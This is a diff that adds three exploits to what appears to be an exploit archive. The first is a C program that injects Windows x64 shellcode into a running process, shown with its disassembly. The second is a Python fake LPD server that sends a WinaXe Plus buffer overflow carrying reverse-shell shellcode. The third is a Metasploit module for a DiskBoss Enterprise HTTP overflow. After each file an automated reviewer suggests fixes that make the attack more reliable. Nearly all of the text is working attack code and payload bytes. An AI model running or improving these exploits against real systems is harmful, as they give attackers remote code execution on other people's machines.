+ 156: 4c 89 e9 mov %r13,%rcx
+ 159: 49 8d 54 24 20 lea 0x20(%r12),%rdx
+ 15e: 41 ff d7 callq *%r15
+ 161: 48 83 f8 01 cmp $0x1,%rax
+ 165: 74 d7 je 13e
+ 167: c9 leaveq
+ 168: c3 retq
+
+0000000000000169 <__exit>:
+ 169: 48 31 d2 xor %rdx,%rdx
+ 16c: 52 push %rdx
+ 16d: 66 ba a4 04 mov $0x4a4,%dx
+ 171: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
+ 174: 48 01 fb add %rdi,%rbx
+ 177: 59 pop %rcx
+ 178: ff d3 callq *%rbx
+
+000000000000017a :
+ 17a: 48 31 d2 xor %rdx,%rdx
+ 17d: 52 push %rdx
+ 17e: 41 5a pop %r10
+ 180: 66 41 ba 0c 0e mov $0xe0c,%r10w
+ 185: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
+ 189: 48 01 fb add %rdi,%rbx
+ 18c: 52 push %rdx
+ 18d: 59 pop %rcx
+ 18e: 45 8b 44 24 28 mov 0x28(%r12),%r8d
+ 193: b9 0a 80 84 1e mov $0x1e84800a,%ecx
+ 198: 81 e9 0b 70 65 1e sub $0x1e65700b,%ecx
+ 19e: ff d3 callq *%rbx
+ 1a0: 49 89 c5 mov %rax,%r13
+ 1a3: 49 83 fd ff cmp $0xffffffffffffffff,%r13
+ 1a7: 74 c0 je 169 <__exit>
+ 1a9: 66 ba ff 04 mov $0x4ff,%dx
+ 1ad: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
+ 1b0: 48 01 fb add %rdi,%rbx
+ 1b3: 48 83 ec 58 sub $0x58,%rsp
+ 1b7: 4c 89 e9 mov %r13,%rcx
+ 1ba: 48 31 d2 xor %rdx,%rdx
+ 1bd: 4d 8b 44 24 10 mov 0x10(%r12),%r8
+ 1c2: 66 41 b9 ff 2f mov $0x2fff,%r9w
+ 1c7: 49 ff c1 inc %r9
+ 1ca: c6 44 24 20 04 movb $0x4,0x20(%rsp)
+ 1cf: ff d3 callq *%rbx
+ 1d1: 49 89 c6 mov %rax,%r14
+ 1d4: 48 31 d2 xor %rdx,%rdx
+ 1d7: 48 39 d0 cmp %rdx,%rax
+ 1da: 74 8d je 169 <__exit>
+ 1dc: 66 ba 43 05 mov $0x543,%dx
+ 1e0: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
+ 1e3: 48 01 fb add %rdi,%rbx
+ 1e6: 48 83 ec 58 sub $0x58,%rsp
+ 1ea: 48 31 d2 xor %rdx,%rdx
+ 1ed: 48 89 54 24 20 mov %rdx,0x20(%rsp)
+ 1f2: 4c 89 e9 mov %r13,%rcx
+ 1f5: 4c 89 f2 mov %r14,%rdx
+ 1f8: 4d 8b 44 24 08 mov 0x8(%r12),%r8
+ 1fd: 4d 8b 4c 24 10 mov 0x10(%r12),%r9
+ 202: ff d3 callq *%rbx
+ 204: 48 83 f8 01 cmp $0x1,%rax
+ 208: 0f 85 5b ff ff ff jne 169 <__exit>
+ 20e: 66 ba a8 02 mov $0x2a8,%dx
+ 212: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
+ 215: 48 01 fb add %rdi,%rbx
+ 218: 48 31 d2 xor %rdx,%rdx
+ 21b: 48 83 ec 58 sub $0x58,%rsp
+ 21f: 4c 89 e9 mov %r13,%rcx
+ 222: 52 push %rdx
+ 223: 52 push %rdx
+ 224: 41 58 pop %r8
+ 226: 66 ba 40 03 mov $0x340,%dx
+ 22a: 44 8b 0c 96 mov (%rsi,%rdx,4),%r9d
+ 22e: 49 01 f9 add %rdi,%r9
+ 231: 5a pop %rdx
+ 232: 4c 89 74 24 20 mov %r14,0x20(%rsp)
+ 237: 4c 89 44 24 28 mov %r8,0x28(%rsp)
+ 23c: 4c 89 44 24 30 mov %r8,0x30(%rsp)
+ 241: ff d3 callq *%rbx
+ 243: e8 21 ff ff ff callq 169 <__exit>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+*/
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+#include
+#include
+#include
+#include
+
+
+char shellcode[]="\x4d\x31\xc0\x41\x50\x41\x50\xc7\x04\x24\x65\x78\x70\x6c\xc7\x44\x24\x04\x6f\x72\x65\x72\xc7\x44\x24\x08\x2e\x65\x78\x65\x48\x8d\x0c\x24\x41\x50\x41\x50\x41\x50\xc7\x04\x24\x43\x3a\x5c\x55\xc7\x44\x24\x04\x73\x65\x72\x73\xc7\x44\x24\x08\x5c\x50\x75\x62\xc7\x44\x24\x0c\x6c\x69\x63\x5c\xc7\x44\x24\x10\x69\x6e\x2e\x64\x66\xc7\x44\x24\x14\x6c\x6c\x48\x8d\x14\x24\x66\x41\xb8\x50\x01\x4c\x29\xc4\x4c\x8d\x24\x24\x6a\x18\x41\x58\x49\x89\x0c\x24\x49\x89\x54\x24\x08\x4d\x89\x44\x24\x10\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x52\x66\xba\x40\x03\x8b\x1c\x96\x48\x01\xfb\xc7\x04\x24\x6d\x73\x76\x63\x66\xc7\x44\x24\x04\x72\x74\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x8d\x54\x24\x58\xc7\x02\x73\x74\x72\x63\x66\xc7\x42\x04\x6d\x70\x48\x89\xc1\x66\x41\xb8\x2c\x09\x42\x8b\x1c\x06\x48\x01\xfb\xff\xd3\x49\x89\x44\x24\x18\x66\xba\xf8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x6a\x02\x59\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\x60\x66\xba\x30\x01\x41\x89\x54\x24\x20\x66\xba\x60\x0e\x8b\x1c\x16\x48\x01\xfb\x49\x8d\x54\x24\x20\x4c\x89\xe9\xff\xd3\x48\x83\xf8\x01\x75\x3d\x48\x31\xd2\x66\xba\x68\x0e\x44\x8b\x3c\x16\x49\x01\xff\x48\x83\xec\x58\x49\x8d\x4c\x24\x4c\x49\x8b\x14\x24\x49\x8b\x5c\x24\x18\xff\xd3\x48\x31\xd2\x48\x39\xd0\x74\x24\x4c\x89\xe9\x49\x8d\x54\x24\x20\x41\xff\xd7\x48\x83\xf8\x01\x74\xd7\xc9\xc3\x48\x31\xd2\x52\x66\xba\xa4\x04\x8b\x1c\x16\x48\x01\xfb\x59\xff\xd3\x48\x31\xd2\x52\x41\x5a\x66\x41\xba\x0c\x0e\x42\x8b\x1c\x16\x48\x01\xfb\x52\x59\x45\x8b\x44\x24\x28\xb9\x0a\x80\x84\x1e\x81\xe9\x0b\x70\x65\x1e\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\xc0\x66\xba\xff\x04\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x4c\x89\xe9\x48\x31\xd2\x4d\x8b\x44\x24\x10\x66\x41\xb9\xff\x2f\x49\xff\xc1\xc6\x44\x24\x20\x04\xff\xd3\x49\x89\xc6\x48\x31\xd2\x48\x39\xd0\x74\x8d\x66\xba\x43\x05\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x48\x31\xd2\x48\x89\
x54\x24\x20\x4c\x89\xe9\x4c\x89\xf2\x4d\x8b\x44\x24\x08\x4d\x8b\x4c\x24\x10\xff\xd3\x48\x83\xf8\x01\x0f\x85\x5b\xff\xff\xff\x66\xba\xa8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x48\x83\xec\x58\x4c\x89\xe9\x52\x52\x41\x58\x66\xba\x40\x03\x44\x8b\x0c\x96\x49\x01\xf9\x5a\x4c\x89\x74\x24\x20\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\xff\xd3\xe8\x21\xff\xff\xff";
+
+
+void inject(DWORD );
+int main(int i,char *a[])
+{
+ if(i!=2)
+ {
+ printf("Usage %s ",a[0]);
+ return 0;
+ }
+
+ BOOL f=0;
+ HANDLE snap;
+ PROCESSENTRY32 pe32;
+
+ snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
+
+ if(snap==INVALID_HANDLE_VALUE)
+ {
+ printf("CreateToolhelp32Snapshot() Failed."); return 0;
+ }
+
+ pe32.dwSize=sizeof(pe32);
+
+ if(!Process32First(snap,&pe32))
+ {
+ printf("Process32First() Failed."); return 0;
+ }
+
+
+
+ do
+ {
+ if(0==strncmp(a[1],pe32.szExeFile,strlen(pe32.szExeFile)))
+ {
+ f=TRUE;
+ break;
+ }
+
+ }while(Process32Next(snap,&pe32));
+
+
+ if(!f)
+ {
+ printf("No infomation found about \"%s\" ",a[1]);
+ }
+ else
+ {
+ printf("Program name:%s\nProcess id: %d",pe32.szExeFile,pe32.th32ProcessID);
+ printf("\nInjecting shellcode");
+ inject(pe32.th32ProcessID);
+ }
+
+
+
+ return 0;
+
+}
+
+
+
+void inject(DWORD pid)
+{
+ HANDLE phd,h;
+ LPVOID shell;
+
+ phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
+
+ if(phd==INVALID_HANDLE_VALUE)
+ {
+ printf("\nOpenProcess() Failed."); return ;
+ }
+
+ shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
+ if(shell==NULL)
+ {
+ printf("\nVirtualAllocEx() Failed"); return ; CloseHandle(phd);
+ }
+
+ WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
+ printf("\nInjection successfull\n");
+ printf("Running Shellcode......\n");
+
+ h=CreateRemoteThread(phd,NULL,2046,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
+ if(h==NULL)
+ {
+ printf("Failed to Run Shellcode\n"); return ;
+ }
+}
+
+
+
+
+
+
+
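Review bot: The `if(phd==INVALID_HANDLE_VALUE)` check in `inject` never fires, because OpenProcess returns NULL on failure rather than INVALID_HANDLE_VALUE, so a failed open falls through into VirtualAllocEx with a null handle; the check should be `if(phd==NULL)`. In the VirtualAllocEx failure branch the `CloseHandle(phd)` placed after `return ;` is unreachable, and on the success path neither `phd` nor the thread handle `h` is ever closed; WriteProcessMemory's return value is discarded as well, so a partial write is reported as "Injection successfull". The four `#include` lines near the top of the C section read as empty here, and the disassembly labels at `13e` and `17a` are missing their names, which suggests angle-bracketed text was stripped in this rendering rather than absent from the file. A documentation nit: the assembly comment `;VirualAlloc()` above the VirtualAllocEx prototype should read `;VirtualAllocEx()` to match the call it annotates.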
diff --git a/platforms/windows/remote/41073.py b/platforms/windows/remote/41073.py
new file mode 100755
index 000000000..67a604562
--- /dev/null
+++ b/platforms/windows/remote/41073.py
@@ -0,0 +1,64 @@
+# Exploit Title: WinaXe Plus 8.7 - lpr remote buffer overflow
+# Date: 2017-01-16
+# Exploit Author: Peter Baris
+# Exploit link: http://www.saptech-erp.com.au/resources/winaxe_lpr.zip
+# Software Link: http://www.labf.com/download/winaxep-ok.html
+# Version: 8.7
+# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
+#Start the fake LPD daemon -> Add the network printer -> Close
+
+import socket
+
+# WinAxe Plus 8.7 - lpr remote buffer overflow
+# Author: Peter Baris
+# Tested on Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
+
+#reverse shell to 192.168.0.13 port 4444, length: 351 bytes, bad characters \x00\x0a\x0d
+shell = ("\xb8\xb1\x79\xd9\xb5\xdb\xdc\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
+"\x52\x83\xeb\xfc\x31\x43\x0e\x03\xf2\x77\x3b\x40\x08\x6f\x39"
+"\xab\xf0\x70\x5e\x25\x15\x41\x5e\x51\x5e\xf2\x6e\x11\x32\xff"
+"\x05\x77\xa6\x74\x6b\x50\xc9\x3d\xc6\x86\xe4\xbe\x7b\xfa\x67"
+"\x3d\x86\x2f\x47\x7c\x49\x22\x86\xb9\xb4\xcf\xda\x12\xb2\x62"
+"\xca\x17\x8e\xbe\x61\x6b\x1e\xc7\x96\x3c\x21\xe6\x09\x36\x78"
+"\x28\xa8\x9b\xf0\x61\xb2\xf8\x3d\x3b\x49\xca\xca\xba\x9b\x02"
+"\x32\x10\xe2\xaa\xc1\x68\x23\x0c\x3a\x1f\x5d\x6e\xc7\x18\x9a"
+"\x0c\x13\xac\x38\xb6\xd0\x16\xe4\x46\x34\xc0\x6f\x44\xf1\x86"
+"\x37\x49\x04\x4a\x4c\x75\x8d\x6d\x82\xff\xd5\x49\x06\x5b\x8d"
+"\xf0\x1f\x01\x60\x0c\x7f\xea\xdd\xa8\xf4\x07\x09\xc1\x57\x40"
+"\xfe\xe8\x67\x90\x68\x7a\x14\xa2\x37\xd0\xb2\x8e\xb0\xfe\x45"
+"\xf0\xea\x47\xd9\x0f\x15\xb8\xf0\xcb\x41\xe8\x6a\xfd\xe9\x63"
+"\x6a\x02\x3c\x23\x3a\xac\xef\x84\xea\x0c\x40\x6d\xe0\x82\xbf"
+"\x8d\x0b\x49\xa8\x24\xf6\x1a\x17\x10\xf8\xd7\xff\x63\xf8\xf6"
+"\xa3\xea\x1e\x92\x4b\xbb\x89\x0b\xf5\xe6\x41\xad\xfa\x3c\x2c"
+"\xed\x71\xb3\xd1\xa0\x71\xbe\xc1\x55\x72\xf5\xbb\xf0\x8d\x23"
+"\xd3\x9f\x1c\xa8\x23\xe9\x3c\x67\x74\xbe\xf3\x7e\x10\x52\xad"
+"\x28\x06\xaf\x2b\x12\x82\x74\x88\x9d\x0b\xf8\xb4\xb9\x1b\xc4"
+"\x35\x86\x4f\x98\x63\x50\x39\x5e\xda\x12\x93\x08\xb1\xfc\x73"
+"\xcc\xf9\x3e\x05\xd1\xd7\xc8\xe9\x60\x8e\x8c\x16\x4c\x46\x19"
+"\x6f\xb0\xf6\xe6\xba\x70\x06\xad\xe6\xd1\x8f\x68\x73\x60\xd2"
+"\x8a\xae\xa7\xeb\x08\x5a\x58\x08\x10\x2f\x5d\x54\x96\xdc\x2f"
+"\xc5\x73\xe2\x9c\xe6\x51")
+
+
+
+#100299DD - CALL ESP in xwpdllib.dll
+buffer="A"*512+"\xdd\x99\x02\x10"+"\x90"*32+shell
+port = 515
+s = socket.socket()
+ip = '0.0.0.0'
+s.bind((ip, port))
+s.listen(5)
+
+print 'Listening on LPD port: '+str(port)
+
+while True:
+ conn, addr = s.accept()
+ conn.send(buffer)
+ conn.close()
+
+
+
+
+
+
+
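Review bot: `conn.send(buffer)` in the accept loop may transmit only part of the roughly 899-byte payload (512 filler + 4-byte CALL ESP address + 32 NOPs + 351-byte shellcode) and silently drop the remainder, so the return address or shellcode can fail to reach the client; use `conn.sendall(buffer)`. The listening socket never sets `SO_REUSEADDR`, so restarting the fake LPD service on port 515 shortly after a client has connected is likely to fail with "Address already in use" — add `s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)` before `s.bind((ip, port))`. The `print` statement pins the script to Python 2; anyone porting it to Python 3 must also make `buffer` a `bytes` literal, since `str` cannot be passed to `send`. The embedded shellcode is a reverse shell to a fixed 192.168.0.13:4444, so a header note such as `# regenerate shell for your listener; keep bad chars \x00\x0a\x0d` would stop reuse with the stale target.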
diff --git a/platforms/windows/remote/41079.rb b/platforms/windows/remote/41079.rb
new file mode 100755
index 000000000..cf7778bb2
--- /dev/null
+++ b/platforms/windows/remote/41079.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Seh
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability
+ in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
+ caused by improper bounds checking of the request path in HTTP GET
+ requests sent to the built-in web server. This module has been
+ tested successfully on Windows XP SP3 and Windows 7 SP1.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'vportal', # Vulnerability discovery and PoC
+ 'Gabor Seljan' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['EDB', '40869']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x09\x0a\x0d\x20",
+ 'Space' => 2000
+ },
+ 'Targets' =>
+ [
+ [
+ 'Automatic Targeting',
+ {
+ 'auto' => true
+ }
+ ],
+ [
+ 'DiskBoss Enterprise v7.4.28',
+ {
+ 'Offset' => 2471,
+ 'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
+ }
+ ],
+ [
+ 'DiskBoss Enterprise v7.5.12',
+ {
+ 'Offset' => 2471,
+ 'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
+ }
+ ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Dec 05 2016',
+ 'DefaultTarget' => 0))
+ end
+
+ def check
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/'
+ )
+
+ if res && res.code == 200
+ if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
+ return Exploit::CheckCode::Vulnerable
+ elsif res.body =~ /DiskBoss Enterprise/
+ return Exploit::CheckCode::Detected
+ end
+ else
+ vprint_error('Unable to determine due to a HTTP connection timeout')
+ return Exploit::CheckCode::Unknown
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ mytarget = target
+
+ if target['auto']
+ mytarget = nil
+
+ print_status('Automatically detecting the target...')
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/'
+ )
+
+ if res && res.code == 200
+ if res.body =~ /DiskBoss Enterprise v7\.4\.28/
+ mytarget = targets[1]
+ elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
+ mytarget = targets[2]
+ end
+ end
+
+ if !mytarget
+ fail_with(Failure::NoTarget, 'No matching target')
+ end
+
+ print_status("Selected Target: #{mytarget.name}")
+ end
+
+ sploit = make_nops(21)
+ sploit << payload.encoded
+ sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+ sploit << [mytarget.ret].pack('V')
+ sploit << rand_text_alpha(2500)
+
+ send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => sploit
+ )
+ end
+end
\ No newline at end of file
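Review bot: `include Msf::Exploit::Remote::Seh` in the mixin list is unused — `exploit` overwrites a saved return address with an `ADD ESP,0x68 # RETN` gadget and never calls `generate_seh_record` or `generate_seh_payload`, so the include should be removed rather than suggest an SEH overwrite to readers. In `check`, the `else` branch reports "Unable to determine due to a HTTP connection timeout" for any non-200 reply as well as for a nil one, which is misleading when the web interface answers 401 or 404; separate the cases with `return Exploit::CheckCode::Unknown unless res` and `vprint_error("Unexpected HTTP status #{res.code}")` before falling through. The automatic-target branch of `exploit` repeats the same `GET /` that `check` already issues; a small private helper returning the matched target would let both methods share one version regex. The padding `rand_text_alpha(mytarget['Offset'] - payload.encoded.length)` does not subtract the 21-byte NOP sled, so the return address lands at Offset + 21 bytes into the path — presumably Offset was measured that way by the author, but a comment such as `# Offset excludes the 21-byte sled` would make that explicit.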